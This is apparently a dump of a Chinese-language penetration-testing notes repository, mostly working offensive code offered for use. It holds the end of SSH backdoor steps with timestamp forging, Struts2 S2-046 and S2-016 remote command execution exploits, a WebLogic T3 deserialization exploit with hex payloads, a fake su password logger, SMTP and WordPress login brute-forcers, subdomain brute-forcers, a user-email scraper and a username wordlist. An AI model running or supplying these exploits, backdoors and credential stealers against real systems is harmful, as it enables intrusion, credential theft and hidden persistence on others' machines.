9、恢复新配置文件的日期跟旧文件日期一致 43 | 对ssh_config和sshd_config新旧文件进行内容对比,使其配置文件一致,然后在修改文件日期。 44 | touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config 45 | touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config 46 | 47 | 10、测试 48 | ssh root@ip 49 | 输入刚才设定的后门的密码,如果登录成功,表示设定ok! 50 | -------------------------------------------------------------------------------- /port_scan.py: -------------------------------------------------------------------------------- 1 | #coding = utf-8 2 | import socket 3 | ports = [21,80,443,143,445] 4 | def port_scan(host,port): 5 | try: 6 | socket.setdefaulttimeout(3) 7 | s = socket.socket() 8 | s.connect((host,port)) 9 | print '[+] %s open' % port 10 | except: 11 | print '[-] %s close' % port 12 | pass 13 | for port in ports: 14 | 15 | port_scan('192.168.1.102',port) 16 | -------------------------------------------------------------------------------- /quchong_1.py: -------------------------------------------------------------------------------- 1 | a = open('asp.txt','r') 2 | dd = open('aspok.txt','w') 3 | for b in a: 4 | if b[0] == '/': 5 | b = b[1:] 6 | cc = b.strip() 7 | print cc 8 | dd.write(cc + '\n') 9 | else: 10 | cc = b.strip() 11 | print cc 12 | dd.write(cc + '\n') 13 | 14 | 容我用笨的方式进行: 15 | 因为有的时候/admin和admin目录是一样的效果,用平常的去重软件是无法去重的,我就先把开头为/的给删掉,那么剩下的就全部是开头没有/的,然后用linux的uniq去重了。。。。 16 | -------------------------------------------------------------------------------- /quchong_2.py: -------------------------------------------------------------------------------- 1 | yuan = open('360webscan_dic+anquan_dic.txt','r') 2 | baocun = open('360webscan_dic+anquan_dic_ok.txt','w') 3 | for y in yuan: 4 | y = y.strip() 5 | if y[0] != '/': 6 | baocun.write('/' + y + '\n') 7 | else: 8 | baocun.write(y + '\n') 9 | 10 | 11 | 12 | //这里https://github.com/Jumbo-WJB/notes/blob/master/quchong_1.py应该把所有的字典都去掉了斜杠/,然后去重,那么去重以后呢,我发现如果字典里没有/的话,御剑无法扫,那么就加上/ 13 | -------------------------------------------------------------------------------- /redmine_get_user.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import time 4 | number = range(1,66) 5 | for n in number: 6 | url = 'http://chinabaiker.com/redmine/users/%s' % n 7 | #print n 8 | #print url 9 | headers = {"cookie":"_redmine_session=redminecookies"} 10 | geturl = requests.get(url,headers=headers) 11 | #time.sleep(1) 12 | #print geturl.content 13 | content1 = geturl.content 14 | regex = '\"mailto:(.*?)\"\>' 15 | key = re.findall(regex,content1) 16 | for k in key: 17 | print k 18 | if k == None: 19 | pass 20 | -------------------------------------------------------------------------------- /same-ip-search.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | ''' 4 | Author:Jumbo 5 | Website:http://www.chinabaiker.com 6 | Date:2015/22/3 7 | Thanks:ziwen,L3m0n,Object 8 | ''' 9 | import urllib 10 | import sys 11 | import re 12 | try: 13 | url = "http://s.tool.chinaz.com/same?s= " 14 | zhan = sys.argv[1] 15 | f = open(zhan + ".txt","w") 16 | jieguo = urllib.urlopen(url + str(zhan)) 17 | content = jieguo.read() 18 | ree = r"\" target\=\_blank\>(.*?)\<\/a\>\<\/div\>" 19 | ss = re.findall(ree,content) 20 | for x in ss: 21 | print>>f,x 22 | print 'ok,look ' + zhan + '.txt.' 23 | f.close() 24 | except: 25 | print 'eg:python %s www.chinabaiker.com' % sys.argv[0] 26 | 27 | -------------------------------------------------------------------------------- /smtp_brute.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | 3 | import smtplib 4 | import threading 5 | from queue import Queue 6 | 7 | 8 | mail_host = "mail.360.net" 9 | 10 | 11 | 12 | def run(): 13 | while True: 14 | u,p = q.get() 15 | try: 16 | smtp = smtplib.SMTP(mail_host) 17 | smtp.login(u,p) 18 | smtp.quit() 19 | print('{} : {} ok'.format(u,p)) 20 | except Exception as e: 21 | pass 22 | finally: 23 | q.task_done() 24 | 25 | q = Queue() 26 | threads = [] 27 | 28 | for i in range(6): 29 | t = threading.Thread(target=run) 30 | threads.append(t) 31 | for t in threads: 32 | t.setDaemon(True) 33 | t.start() 34 | 35 | 36 | 37 | 38 | 39 | with open('user.txt') as users: 40 | for u in users: 41 | u = u.strip() 42 | # print(u) 43 | with open('pass.txt') as passwords: 44 | for p in passwords: 45 | p = p.strip() 46 | # print(p) 47 | q.put((u,p)) 48 | q.join() 49 | -------------------------------------------------------------------------------- /struts2-046.py: -------------------------------------------------------------------------------- 1 | #author=Jumbo 2 | #website:www.chinabaiker.com 3 | import requests 4 | import sys 5 | try: 6 | url = sys.argv[1] 7 | headers = {'Connection':'close','Content-Type':'multipart/form-data; boundary=---------------------------735323031399963166993862150','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'} 8 | data="-----------------------------735323031399963166993862150\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + sys.argv[2] + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n-----------------------------735323031399963166993862150--\r\n\r\n" 9 | get = requests.post(url,data=data,headers=headers) 10 | print get.content 11 | except: 12 | 13 | print 'usage:struts2-046.py www.chinabaiker.com whoami' 14 | -------------------------------------------------------------------------------- /struts2-Batch-scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import requests 4 | a = open("ip.txt","r") 5 | b = ("/index.action","/index.do","/login.do","/login.action") 6 | x = open("success.txt","w") 7 | for c in a: 8 | d = c.strip() 9 | for e in b: 10 | g = requests.get(str(d) + str(e)) 11 | print g.url 12 | if g.status_code == 200: 13 | print>>x,g.url 14 | a.close() 15 | x.close() 16 | 17 | 18 | 备注: 19 | ip.txt放要扫描的url,一行一个 20 | b那里可以自定义要扫描的str2后缀 21 | 会把返回200的写到success文档里 22 | 23 | 然后可以再利用str2批量EXP工具,把成功的url导入进去 24 | 25 | 26 | 如果不想导入,再放上一个直接测试的,当然,可能会有误报,因为只放了一个016的poc进去: 27 | #!/usr/bin/python 28 | # -*- coding:utf-8 -*- 29 | import requests 30 | a = open("ip.txt","r") 31 | b = ("/index.action","/index.do","/login.do","/login.action","/messageAction!toSubSug.action") 32 | payload = "?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B'netstat','-an'%7D)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader%20(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println%20(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D" 33 | x = open("success.txt","w") 34 | for c in a: 35 | d = c.strip() 36 | for e in b: 37 | g = requests.get(str(d) + str(e),timeout=15) 38 | print g.url 39 | if g.status_code == 200 or 500: 40 | z = requests.get(str(g.url) + str(payload),timeout=15) 41 | if z.status_code == 200 or 500 and z.content.find('TCP')!=-1: 42 | print z 43 | print>>x,g.url 44 | a.close() 45 | x.close() 46 | -------------------------------------------------------------------------------- /su.py: -------------------------------------------------------------------------------- 1 | #alias su="python root.py" 2 | import os 3 | import sys 4 | import getpass 5 | import time 6 | 7 | current_time = time.strftime("%Y-%m-%d %H:%M") 8 | logfile = "su.log" 9 | 10 | fail_str = "su: Authentication failure" 11 | 12 | try: 13 | passwd = getpass.getpass(prompt="Password: ") 14 | file=open(logfile, "a") 15 | file.write("[%s]\t %s" % (passwd, current_time)) 16 | file.write("\n") 17 | file.close() 18 | except: 19 | pass 20 | time.sleep(1) 21 | print fail_str 22 | os.system("su") 23 | -------------------------------------------------------------------------------- /subdomain_brute.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import sys 3 | def SubDomain(): 4 | domain = sys.argv[1] 5 | with open('sub.txt') as sub: 6 | for subs in sub: 7 | subdomain = str(subs.strip()) + '.' + domain 8 | # print subdomain 9 | # print subs 10 | try: 11 | subconnect = socket.gethostbyname_ex(subdomain) 12 | print subconnect[0] + ':' + subconnect[2][0] 13 | except: 14 | pass 15 | 16 | 17 | SubDomain() 18 | -------------------------------------------------------------------------------- /subdomain_brute_th.py: -------------------------------------------------------------------------------- 1 | #python subdomain_brute_th.py chinabaiker.com 50 2 | #author:Jumbo 3 | import socket 4 | import sys 5 | import threading 6 | import Queue 7 | 8 | class SubDomainBrute(object): 9 | def __init__(self,domain,thread): 10 | self.domain = domain 11 | self.thread = thread 12 | self.queue = Queue.Queue() 13 | 14 | 15 | def open_dict(self): 16 | for sub in open('sub.txt', 'r'): 17 | self.queue.put(sub.strip()) 18 | 19 | def run(self): 20 | while not self.queue.empty(): 21 | domain = self.queue.get() 22 | self.domainbrute(domain) 23 | 24 | 25 | 26 | def domainbrute(self, domain): 27 | mutex.acquire() 28 | subdomain = domain + '.' + self.domain 29 | try: 30 | subconnect = socket.gethostbyname_ex(subdomain) 31 | print subconnect[0] + ':' + subconnect[2][0] 32 | mutex.release() 33 | except: 34 | pass 35 | 36 | domain = sys.argv[1] 37 | thread = sys.argv[2] 38 | work = SubDomainBrute(domain,thread) 39 | mutex = threading.Lock() 40 | work.open_dict() 41 | threadlist = [threading.Thread(target=work.run) for x in xrange(int(thread))] 42 | for t in threadlist: 43 | t.start() 44 | for t in threadlist: 45 | t.join() 46 | -------------------------------------------------------------------------------- /subdomainbrute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import re 4 | import sys 5 | import requests 6 | data = "domain=" + sys.argv[1] + "&b2=1&b3=1&b4=1" 7 | test = open('test.txt','w') 8 | key = r"value=\"(.+?)\"> 4: 13 | print '0' 14 | bins += '0' 15 | else: 16 | print '1' 17 | bins += '1' 18 | print bins 19 | print chr(int(bins,2)) 20 | -------------------------------------------------------------------------------- /weakpwdfuzz.py: -------------------------------------------------------------------------------- 1 | import sys 2 | try: 3 | key = sys.argv[1] 4 | dic = open('dic.txt','r') 5 | suc = open('ok.txt','w') 6 | for a in dic: 7 | a = a.strip() 8 | a = a.replace("%username%",key) 9 | print a 10 | suc.write(a+'\n') 11 | dic.close() 12 | suc.close() 13 | except: 14 | print "usage: %s chinabaiker" % sys.argv[0] 15 | 16 | 17 | 18 | 练习一下def 19 | import sys 20 | def weakpwdfuzz(): 21 | try: 22 | key = sys.argv[1] 23 | dic = open('dic.txt','r') 24 | suc = open('ok.txt','w') 25 | for a in dic: 26 | a = a.strip() 27 | a = a.replace("%username%",key) 28 | print a 29 | suc.write(a+'\n') 30 | dic.close() 31 | suc.close() 32 | except: 33 | print "usage: %s chinabaiker" % sys.argv[0] 34 | if __name__ == '__main__': 35 | weakpwdfuzz() 36 | 37 | 38 | 使用方法 39 | python weakpwdfuzz.py chinabaiker 40 | ------- 41 | chinabaiker 42 | chinabaiker1 43 | chinabaiker12 44 | chinabaiker123 45 | chinabaiker123 46 | -------- 47 | dic.txt放模版字典,本目录有个规则,可以直接使用 48 | -------------------------------------------------------------------------------- /weblogic.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import socket 3 | import time 4 | import re 5 | 6 | # 7 | # @author iswin@threathunter.org 8 | # reffer: nessus 9 | # 10 | 11 | VUL=['CVE-2016-0638','CVE-2016-3510','CVE-2017-3248'] 12 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] 13 | VER_SIG=['weblogic.jms.common.StreamMessageImpl','org.apache.commons.collections.functors.InvokerTransformer','\\$Proxy[0-9]+'] 14 | 15 | def t3handshake(sock,server_addr): 16 | sock.connect(server_addr) 17 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 18 | time.sleep(1) 19 | sock.recv(1024) 20 | print 'handshake successful' 21 | 22 | def buildT3RequestObject(sock,port): 23 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 24 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport)) 25 | data3 = '1a7727000d3234322e323134' 26 | data4 = '2e312e32353461863d1d0000000078' 27 | for d in [data1,data2,data3,data4]: 28 | sock.send(d.decode('hex')) 29 | time.sleep(2) 30 | print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) 31 | 32 | 33 | def sendEvilObjData(sock,data): 34 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 35 | payload+=data 36 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 37 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) 38 | sock.send(payload.decode('hex')) 39 | res = '' 40 | try: 41 | while True: 42 | res += sock.recv(4096) 43 | time.sleep(0.1) 44 | except Exception as e: 45 | pass 46 | return res 47 | 48 | def checkVul(res,server_addr,index): 49 | p=re.findall(VER_SIG[index], res, re.S) 50 | if len(p)>0: 51 | print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) 52 | else: 53 | print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) 54 | 55 | 56 | def run(dip,dport,index): 57 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 58 | ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 59 | sock.settimeout(15) 60 | server_addr = (dip, dport) 61 | t3handshake(sock,server_addr) 62 | buildT3RequestObject(sock,dport) 63 | rs=sendEvilObjData(sock,PAYLOAD[index]) 64 | checkVul(rs,server_addr,index) 65 | 66 | 67 | if __name__=="__main__": 68 | dip = '10.28.1.51' 69 | dport = 8070 70 | for i in range(0,len(VUL)): 71 | run(dip,dport,i) 72 | -------------------------------------------------------------------------------- /wordpress批量爆破程序.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import requests 4 | import cookielib 5 | import urllib2 6 | import urllib 7 | bc = open('success.txt','w') 8 | ht = "/wp-login.php" 9 | headers = {"Content-type":"application/x-www-form-urlencoded","User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0", 10 | "Connection": "keep-alive"} 11 | urls = open('url.txt','r') 12 | for x in urls: 13 | x = x.strip() 14 | print x,"==============" 15 | try: 16 | qq = requests.get(str(x) + str(ht),timeout=15) 17 | if qq.status_code == 200: 18 | print qq.url 19 | user = open('user.txt','r') 20 | for u in user: 21 | u = u.strip() 22 | print "username: ",u 23 | pw = open('pass.txt','r') 24 | for p in pw: 25 | p = p.strip() 26 | print "password: ",p 27 | #设置一个cookie处理器,它负责从服务器下载cookie到本地,并且在发送请求时带上本地的cookie 28 | cj = cookielib.LWPCookieJar() 29 | cookie_support = urllib2.HTTPCookieProcessor(cj) 30 | opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler) 31 | urllib2.install_opener(opener) 32 | postData = {'log':u,'pwd':p} 33 | #需要给Post数据编码 34 | postData = urllib.urlencode(postData) 35 | #通过urllib2提供的request方法来向指定Url发送我们构造的数据,并完成登录过程 36 | request = urllib2.Request(qq.url, postData, headers) 37 | response = urllib2.urlopen(request) 38 | text = response.read() 39 | #print text 40 | if text.find('Dashboard')!=-1 or text.find('仪表盘').decode('gb2312').encode('utf-8')!=-1: 41 | print 'success',qq.url , 'username is: ' + u , 'password is : ' + p 42 | print>>bc,'success',qq.url , 'username is: ' + u , 'password is : ' + p 43 | break 44 | except: 45 | pass 46 | 47 | -------------------------------------------------------------------------------- /xh.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from bs4 import BeautifulSoup 3 | #(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,4}) 4 | def XHRe(): 5 | with open('urls.txt') as urls: 6 | for url in urls: 7 | url = url.strip() 8 | url = 'http://' + url 9 | try: 10 | get = requests.get(url,timeout=5).text 11 | # print(get) 12 | soup = BeautifulSoup(get,'lxml') 13 | print(url,soup.title) 14 | except Exception as e: 15 | print(e) 16 | pass 17 | 18 | XHRe() 19 | -------------------------------------------------------------------------------- /xingming500.txt: -------------------------------------------------------------------------------- 1 | zhangwei 2 | zhangw 3 | zw 4 | zwei 5 | wangwei 6 | wangw 7 | ww 8 | wwei 9 | wangfang 10 | wangf 11 | wf 12 | wfang 13 | liwei 14 | liw 15 | lw 16 | lwei 17 | lina 18 | lin 19 | ln 20 | lna 21 | zhangmin 22 | zhangm 23 | zm 24 | zmin 25 | lijing 26 | lij 27 | lj 28 | ljing 29 | wangjing 30 | wangj 31 | wj 32 | wjing 33 | liuwei 34 | liuw 35 | lw 36 | lwei 37 | wangxiuying 38 | wangxy 39 | wxy 40 | wxiuying 41 | zhangli 42 | zhangl 43 | zl 44 | zli 45 | lixiuying 46 | lixy 47 | lxy 48 | lxiuying 49 | wangli 50 | wangl 51 | wl 52 | wli 53 | zhangjing 54 | zhangj 55 | zj 56 | zjing 57 | zhangxiuying 58 | zhangxy 59 | zxy 60 | zxiuying 61 | liqiang 62 | liq 63 | lq 64 | lqiang 65 | wangmin 66 | wangm 67 | wm 68 | wmin 69 | limin 70 | lim 71 | lm 72 | lmin 73 | wanglei 74 | wangl 75 | wl 76 | wlei 77 | liuyang 78 | liuy 79 | ly 80 | lyang 81 | wangyan 82 | wangy 83 | wy 84 | wyan 85 | wangyong 86 | wangy 87 | wy 88 | wyong 89 | lijun 90 | lij 91 | lj 92 | ljun 93 | zhangyong 94 | zhangy 95 | zy 96 | zyong 97 | lijie 98 | lij 99 | lj 100 | ljie 101 | zhangjie 102 | zhangj 103 | zj 104 | zjie 105 | zhanglei 106 | zhangl 107 | zl 108 | zlei 109 | wangqiang 110 | wangq 111 | wq 112 | wqiang 113 | lijuan 114 | lij 115 | lj 116 | ljuan 117 | wangjun 118 | wangj 119 | wj 120 | wjun 121 | zhangyan 122 | zhangy 123 | zy 124 | zyan 125 | zhangtao 126 | zhangt 127 | zt 128 | ztao 129 | wangtao 130 | wangt 131 | wt 132 | wtao 133 | liyan 134 | liy 135 | ly 136 | lyan 137 | wangchao 138 | wangc 139 | wc 140 | wchao 141 | liming 142 | lim 143 | lm 144 | lming 145 | liyong 146 | liy 147 | ly 148 | lyong 149 | wangjuan 150 | wangj 151 | wj 152 | wjuan 153 | liujie 154 | liuj 155 | lj 156 | ljie 157 | liumin 158 | lium 159 | lm 160 | lmin 161 | lixia 162 | lix 163 | lx 164 | lxia 165 | lili 166 | lil 167 | ll 168 | lli 169 | zhangjun 170 | zhangj 171 | zj 172 | zjun 173 | wangjie 174 | wangj 175 | wj 176 | wjie 177 | zhangqiang 178 | zhangq 179 | zq 180 | zqiang 181 | wangxiulan 182 | wangxl 183 | wxl 184 | wxiulan 185 | wanggang 186 | wangg 187 | wg 188 | wgang 189 | wangping 190 | wangp 191 | wp 192 | wping 193 | liufang 194 | liuf 195 | lf 196 | lfang 197 | zhangyan 198 | zhangy 199 | zy 200 | zyan 201 | liuyan 202 | liuy 203 | ly 204 | lyan 205 | liujun 206 | liuj 207 | lj 208 | ljun 209 | liping 210 | lip 211 | lp 212 | lping 213 | wanghui 214 | wangh 215 | wh 216 | whui 217 | wangyan 218 | wangy 219 | wy 220 | wyan 221 | chenjing 222 | chenj 223 | cj 224 | cjing 225 | liuyong 226 | liuy 227 | ly 228 | lyong 229 | liling 230 | lil 231 | ll 232 | lling 233 | liguiying 234 | ligy 235 | lgy 236 | lguiying 237 | wangdan 238 | wangd 239 | wd 240 | wdan 241 | ligang 242 | lig 243 | lg 244 | lgang 245 | lidan 246 | lid 247 | ld 248 | ldan 249 | liping 250 | lip 251 | lp 252 | lping 253 | wangpeng 254 | wangp 255 | wp 256 | wpeng 257 | liutao 258 | liut 259 | lt 260 | ltao 261 | chenwei 262 | chenw 263 | cw 264 | cwei 265 | zhanghua 266 | zhangh 267 | zh 268 | zhua 269 | liujing 270 | liuj 271 | lj 272 | ljing 273 | litao 274 | lit 275 | lt 276 | ltao 277 | wangguiying 278 | wanggy 279 | wgy 280 | wguiying 281 | zhangxiulan 282 | zhangxl 283 | zxl 284 | zxiulan 285 | lihong 286 | lih 287 | lh 288 | lhong 289 | lichao 290 | lic 291 | lc 292 | lchao 293 | liuli 294 | liul 295 | ll 296 | lli 297 | zhangguiying 298 | zhanggy 299 | zgy 300 | zguiying 301 | wangyulan 302 | wangyl 303 | wyl 304 | wyulan 305 | liyan 306 | liy 307 | ly 308 | lyan 309 | zhangpeng 310 | zhangp 311 | zp 312 | zpeng 313 | 